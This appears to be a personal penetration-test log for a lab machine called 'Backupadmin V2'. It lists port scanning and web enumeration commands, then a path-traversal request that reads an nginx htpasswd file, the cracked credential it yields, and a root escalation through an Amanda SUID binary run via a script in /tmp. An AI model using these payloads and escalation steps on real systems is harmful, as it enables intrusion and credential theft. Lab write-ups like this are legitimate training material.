Backupadmin V2

๐Ÿงช Pentest Log: {{date:2025-08-24}}

๐Ÿ” Target Information

ip=10.11.1.4

๐Ÿ“ก Enumeration

๐Ÿ”Œ Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 21

Anonymous Login

ftp anonymous@$ip

Found

backupdirs.txt

Port 22

Port 80

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

Found download.php which requires sha1 as e parameter

Google for "PHP File Vault 0.9 exploit", found

https://www.exploit-db.com/exploits/40163

Port 139,445

๐Ÿ’ฃ Exploitation

๐Ÿ“Œ Vulnerability Summary

๐Ÿš€ Exploit Execution

๐Ÿ”ง Exploit Method

Tool / Script Used:

http://10.11.1.4/download.php?sha1=../../../../../../../etc/nginx/htpasswd


backupuser:$apr1$tMyA9cpu$yp0B748Epfcv/No74ohd/0

Crack the hash

backupuser:0811783909

๐Ÿงฌ Privilege Escalation

๐Ÿ‘ค Current Access

๐Ÿ” Enumeration

SUID:

find / -type f -perm -4000 2>/dev/null

found unkonw binary with suid

/usr/sbin/amcheck
/usr/sbin/amservice

Google for exploit, found

https://www.exploit-db.com/exploits/39244

๐Ÿ”“ Privilege Escalation Exploit

๐Ÿ“Œ Exploit Summary

๐Ÿ”ง Exploit Steps

vi /tmp/runme.sh

/usr/lib/amanda/application/amstar restore --star-path=/tmp/runme.sh